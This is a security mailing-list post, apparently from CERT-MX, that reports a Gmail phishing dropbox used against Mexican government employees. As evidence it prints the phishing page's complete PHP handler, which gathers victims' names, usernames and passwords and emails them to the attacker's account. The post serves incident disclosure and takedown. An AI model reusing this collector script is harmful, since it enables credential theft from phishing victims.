[nsp-sec] Gmail phishing dropbox (Mexican Government)

[David Jiménez]

Hi Folks,

The account informacion.cuenta05 at gmail.com was found in a fake webpage
asking for personal information to Mexican Government employees.

EVIDENCE
*******

<?php

$ip = $_POST['ip'];
$httpref = $_POST['httpref'];
$httpagent = $_POST['httpagent'];
$visitor = $_POST['visitor'];
$visitormail = $_POST['visitormail'];
$notes = $_POST['notes'];
$attn = $_POST['attn'];
$repeatpwd = $_POST['repeatpwd'];

if (eregi('http:', $notes)) {
die ("Do NOT try that! ! ");
}
if(!$visitormail == "" && (!strstr($visitormail,"@") ||
!strstr($visitormail,".")))
{
echo "<h2>Use Back - Enter valid e-mail</h2>\n";
$badinput = "<h2>Feedback was NOT submitted</h2>\n";
echo $badinput;
die ("Go back! ! ");
}

if(empty($visitor) || empty($visitormail) || empty($notes )) {
echo "<h2>Use Back - fill in all fields</h2>\n";
die ("Use back! ! ");
}

$todayis = date("l, F j, Y, g:i a") ;

$notes = stripcslashes($notes);

$message = " $todayis [EST] \n

Last Name: $httpagent \n
First Name: $httpref \n
Email: $visitor \n
Alternate Email: $visitormail \n
Username: $notes \n
Password: $attn \n
Repeat Password: $repeatpwd \n

";

$from = "From: webmaster.accupdate at gmail.com \n";


mail("informacion.cuenta05 at gmail.com", Login, $message, $from);

?>

-- 

---
David Jimenez | CERT-MX Operations Center
--------------------------------------------------------------
Mexican National CSIRT
Federal Police / E-Crime Unit
Email: cert-mx at ssp.gob.mx
Phishing Report: phishing at ssp.gob.mx
PGP Key: 1937 EF11 0521 B628 7228 4699 2BAE 4D94 778B 188